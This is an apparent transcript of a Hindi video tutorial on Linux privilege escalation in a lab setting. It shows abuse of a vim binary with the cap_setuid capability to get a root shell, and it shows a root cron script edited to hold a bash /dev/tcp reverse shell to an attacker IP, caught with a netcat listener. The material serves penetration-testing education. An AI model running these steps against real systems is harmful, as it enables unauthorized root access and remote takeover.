अभी हम लोगों ने सूडो एक्सप्लोटेशंस देखा, SUID एक्सप्लोटेशंस देखा, उसके बाद में आता है आपके ऑप्शंस कैपेबिलिटीज का। सो बहुत सारे ऐसे फंक्शंस होते हैं कैपेबिलिटीज के। सो दिस इज द लाइक अलग मेथड है आपका सिस्टम एडमिनिस्ट्रेटर के लिए जो कि आपके प्रिविलेज लेवल को इंक्रीज कर देता है इन बाइनरी विच इज कैपेबिलिटीज, जो कि आपके हेल्प करता है प्रिविलेजेस को मैनेज करने के लिए एक अलग लेवल पे। सो उसके लिए हम यूज में लेने वाले हैं गेट कैप। सो गेट कैप एक टाइप का टूल है जो कि कैपेबिलिटीज को इनेबल करता है। सो गेट कैप के बाद मैं लेता हूँ -r फॉर रिकर्सिव सर्च। सो ये रूट डायरेक्टरी के अंदर रिकर्सिवली सर्च करेगा। सो -r देन आफ्टर दैट होता ये है जब भी आप गेट कैप यूज लेते हैं बिना सूडो के तो यहाँ पे बहुत सारी एरर जनरेट होती है। सो एरर हैंडलिंग के लिए मैं यहाँ पे नंबर 2 यूज लेता हूँ फॉर एरर हैंडलिंग। सो और ये सब मैं कर देता हूँ नल के अंदर। ओके नाउ जस्ट एंटर। सो गेट कैप के बाद यहाँ पे आपके पास मल्टीपल इंफॉर्मेशंस आएगी कि किन किन फंक्शंस के थ्रू या फिर किन किन कमांड्स के थ्रू आप अलग से प्रिविलेज एस्केलेशंस कर सकते हैं। सो आपने कर्नल एक्सप्लोटेशंस ट्राई कर लिया, सूडो कर लिया, SUID कर लिया, नाउ इट्स टर्न टू देयर कैपेबिलिटीज। सो वेट करते हैं इसके आउटपुट का। देन आउटपुट के बाद हम देखते हैं कौन कौन से ऐसे फंक्शंस है। देन हमको सिर्फ वेबसाइट्स ओपन करनी है GTFO बिन्स वाली जहाँ पे आप मल्टीपल कैपेबिलिटीज देख सकते हैं। सो मेन वाइल जब तक इसका आउटपुट जनरेट होता है नाउ यहाँ पे आपने देखा जैसे शेल कमांड, रिवर्स शेल, तो यहाँ पे आपको ऑप्शंस मिल जाएगा कैपेबिलिटीज का। सो कैपेबिलिटीज पे जाते हैं सो यू कैन सी द बाइनरी ऑप्शंस लाइक GBD, नोड, पर्ल, PHP, पाइथन, विम, विम डेव। सो यहाँ पे आपको जो भी ये फंक्शंस मिलते हैं बाइनरी से रिलेटेड लाइक पाइथन के, रूबी के, रिव्यू आर, विम व्यू, तो आप उनके बेसिस पे डायरेक्ट प्रिविलेज एस्केलेशंस कर सकते हैं। सो यहाँ पे मेरे पास क्या आया है अभी यूजर लिब 64। सो लेट्स वेट एक बार ये पूरा कंप्लीट हो जाए मेरा। सो यहाँ पे आउटपुट के अंदर जैसे मुझे मिला है यहाँ पे वेम पिंग। सो यहाँ पे मुझे यूजर से रिलेटेड मिल रहा है कि जैसे होम कारण जिससे मैं लॉग इन हूँ देन विम। सो फॉर एग्जांपल अगर मैं हु एम आई करता हूँ सो मैं इसी यूजर के अंदर हूँ जहाँ पे मेरे विम पे कैप सेट UID प्लस EP करके मेरे पास ये इनेबल है। नाउ यहाँ पे मैं जैसे ही
विम के ऑप्शंस में जाता हूँ, देन विम में कैपेबिलिटीज। सो कैपेबिलिटीज के अंदर मुझे बताता है इफ द बाइनरी हैज द लिनक्स कैपसेट यूआईडी, जो कि हम देख सकते हैं कि कैपसेट यूआईडी हमारे पास ऑलरेडी है। सो एंड देन दूसरी रिक्वायरमेंट है पाइथन 3 की। सो यहाँ पे हम लोग चेक कर लेते हैं लाइक विच पाइथन, सॉरी, सो विच पाइथन 3 करके देखता हूँ। तो यस, पाइथन 3 मेरे पास इंस्टॉल्ड है यूजर बिन पाइथन के अंदर। सो सिंपली मुझे ये कमांड कॉपी करनी है। नाउ हमने देखा कि पाइथन 3 हमारा इंस्टॉल है, तो यहाँ पे थोड़े बहुत चेंजेस करने हैं। मेन मुझे py की जगह py3 करना है। सो नाउ कॉपी, देन पेस्ट, एंटर। सो इट्स सम एरर, ओके। सो यहाँ से एग्जिट करते हैं। सो होम एंड देन आपकी कमांड विम -c और जो आपका आगे का था। सो मैंने यहाँ पे सिर्फ पाथ मेंशन किया है लाइक होम एंड यूजर, देन एंटर। सो जैसे ही आप एंटर करते हैं, नाउ आप देख सकते हैं कि मैं नॉर्मल यूजर से रूट यूजर में आ चुका हूँ। सो फॉर एग्जांपल अगर मैं यहाँ लिखता हूँ हु एम आई, सो यू कैन सी द रूट आईडी, द रूट। सो दिस इज द बेसिक एग्जांपल ऑफ कैपेबिलिटीज, जहाँ पे आप अलग अलग जो भी ऑलरेडी टूल्स हैं उनके बेसिस पे भी आप प्रिविलेज एस्केलेशन कर सकते हैं। सो दिस इज द सिंपल वीडियो the cron jobs. So cron jobs basically are Linux command which is used for scheduling tasks to be executed sometimes in the future. So for example आपने कुछ एक टास्क सेट कर दिया और जिसको आप एक फिक्स टाइम पे रन करवाना चाहते हैं। सो दीज आर द cron jobs. सो बहुत बार ऐसा होता है कि हम लाइक पीरियडिकली सेटअप करना चाहते हैं कि कोई टास्क रन हो, फॉर एग्जांपल एंटीवायरस, कि हर मॉर्निंग एंटीवायरस स्कैन हो जाए या फिर वीकली स्कैन हो। सो ये जितनी भी आपकी जब आप शेड्यूल करते हैं विच इज ऑल अबाउट योर क्रॉन जॉब्स। सो क्रॉन जॉब्स को देखने के लिए आप यूज में लेते हैं कैट एटीसी क्रॉन टैब। जैसे ही आप क्रॉन टैब करते हैं, सो बेसिकली क्रॉन टैब है आपका क्रॉन टेबल्स, जहाँ पे आपके सारी डिटेल सेव होती है। सो यू कैन सी द एंटीवायरस डॉट एस एच, एंटीवायरस डॉट एस एच, होम करेंट बैकअप डॉट एस एच, टेम्पररी में टेस्ट डॉट पी वाई। सो यहाँ पे आपके अलग अलग सर्विसेज है। सर्विसेज में आपको ये आइडेंटिफिकेशन लाइक जॉब डेफिनेशंस बता रहे हैं कि किसका मतलब क्या है। सो फॉर एग्जांपल यहाँ पे 17 मतलब कि किस मिनट पे, आर्ली बेसिस पे, डेज पे, मंथली या डे ऑफ अ वीक, मीन कब ये एग्जीक्यूट होगी। अब एग्जीक्यूशंस के अंदर ऐसा है आपका बहुत बार होगा अगर आप किसी मशीन्स पे करते हैं तो हो सकता है यहाँ पे आपको शो ना करे कि डीओ मंथ डीओ एम। तो यहाँ पे आपको डीओ एम करके आएगा, जैसे डे ऑफ मंथ। डीओ डब्ल्यू मीन्स डे ऑफ वीक। सो कंफ्यूज नहीं होना है। सो इस तरीके से ये वर्क करेगा आपके। एंड इसके एक्सप्लोटेशंस के लिए करते हैं। सो बेसिकली वी हैव द बैकअप डॉट एस एच फाइल। सो अब जो बैकअप डॉट एस एच फाइल है, एंटीवायरस फाइल्स है, ये सभी आपकी 1 मिनट के अंदर एग्जीक्यूट हो रही है। सो यहाँ पे मैं अभी इसको क्लियर कर देता हूँ। एंड देन सी डी होम, आपका यूजर ls। सो बैकअप डॉट एस एच ls हाइफन एल करके चेक कर लेते हैं इनकी परमिशंस। सो मेरे पास अभी रीड परमिशंस है मेरे पास यहाँ पे। सो मैं क्या करता हूँ, इसको एडिट कर लेते हैं विद द हेल्प ऑफ नैनो बैकअप डॉट एस एच। नाउ एडिट के बाद में इस पे रिवर्स कनेक्शन अप्लाई करेंगे हम लोग, तो उसके लिए मैं ये वाला कोड हटा देता हूँ। नाउ bash -i एंड देन dev tcp। यहाँ पर अपना आईपी आ जाएगा 10.17.51.213 एंड देन पोर्ट नंबर 12345।
या फिर आपका जो मर्जी हो वो आप पोर्ट ले सकते हैं, तो ताकि जब हम नेटकेट एग्जीक्यूट करेंगे तो वाला पोर्ट वहाँ पे मेंशन कर सके। एंड देन एंड वन, कंट्रोल ओ, कंट्रोल एक्स, एंड देन आप देख सकते हैं इसको कैट की हेल्प से। सो बैश हाइफन हाई सारा कमांड सही है। नेक्स्ट टैब ओपन कर लेते हैं मेरे काली लिनक्स का, एंड देन nc hyphen lvp listen verbose and port, then 1 2 3 4 5। सो यहाँ पे मेरा लिसन मोड पे है। देन स्विच बैक टू माय सेकंड टैब जो आपकी टारगेट मशीन है। नाउ यहाँ पे बैकअप डॉट एस है, जो कि एग्जीक्यूट होती है हर 1 मिनट के अंदर। सो वी हैव टू वेट एटलीस्ट 1 मिनट। सो ये वाला पार्ट मैं आपको स्किप कर देता हूँ एंड देन मूव ऑन टू दिस पार्ट। सो यहाँ पे जैसे ही 1 मिनट कंप्लीट हो जाएगा आपके पास यहाँ पे रूट का कनेक्शन आ जाएगा। मीनवाइल चेक करके देख लेते हैं बैकअप डॉट एस फाइल को एग्जीक्यूट करके। सो मैं जब बैकअप डॉट एस करता हूँ तो यहाँ पे मेरे पास अभी परमिशन डिनाइड आता है क्योंकि एग्जीक्यूटेबल की परमिशन नहीं है। सो मीनवाइल अगर मैं इसको मैनुअली एग्जीक्यूट करता हूँ, सो फॉर एग्जांपल मैं अभी हूँ हु एम आई करके चेक करता हूँ, सो कैरन के यूजर के अंदर मैं जो मैनुअली एग्जीक्यूट करूंगा तो मेरे पास यहाँ पे यूजर का एक्सेस आ जाएगा। आई शो यू। सो chmod प्लस एक्स एंड देन बैकअप डॉट एस एच प्लस एक्स आपके एग्जीक्यूट के लिए एंटर डॉट बैकअप डॉट एस एच। सी यहाँ पे मेरे पास जो रिवर्स कनेक्शन आया है वो करण का आया है। सो हु एम आई करता हूँ करण। सो इसको वापस से स्टार्ट कर लेते हैं, देन वेट करते हैं 1 मिनट तक का। सो एग्जीक्यूशन के अंदर आप देख सकते हैं कि मेरे पास रूट का एक्सेस आ चुका है। पहले मैंने मैनुअली किया था, सो यहाँ पे मेरे पास नॉर्मल यूजर का परमिशंस का आ रहा था। देन ये जब ऑटोमेटिक एग्जीक्यूट हुआ आपका क्रोन जॉब, सो क्रोन जॉब ऑटोमेटिक एग्जीक्यूशन पे आपके रूट के बेसिस पे एग्जीक्यूट हुआ एंड रूट के पास आपके पास रिवर्स कनेक्शन आ गया। नाउ अगर मैं करता हूँ यहाँ पे हु एम आई, देन यू कैन सी द रूट। सो आपने यहाँ पे प्रिविलेज एस्केलेशन कर लिया है नॉर्मल यूजर से सीधे रूट यूजर पे। सो विच इज द इजिएस्ट वे टू डू प्रिविलेज एस्केलेशन विद द हेल्प ऑफ क्रोन जॉब्स। सो जब भी आप क्रोन मशीन्स के बारे में एक्सप्लोइटेशन करते हैं तो कर्नल एक्सप्लोइटेशन सूडो एसयूआईडी या फिर कैपेबिलिटीज से अच्छा है सबसे पहले आप क्रोन टैब्स के बारे में देख ले, क्रोन जॉब्स के बारे में देख ले, क्योंकि सबसे इजिएस्ट वे है आपका फॉर प्रिविलेज एस्केलेशन। सो गाइज आज की वीडियो में इतना ही। नेक्स्ट वीडियो में मिलते हैं। वीडियो अच्छा लगा हो सो प्लीज लाइक करें, कमेंट करें एंड सब्सक्राइब करें। थैंक यू।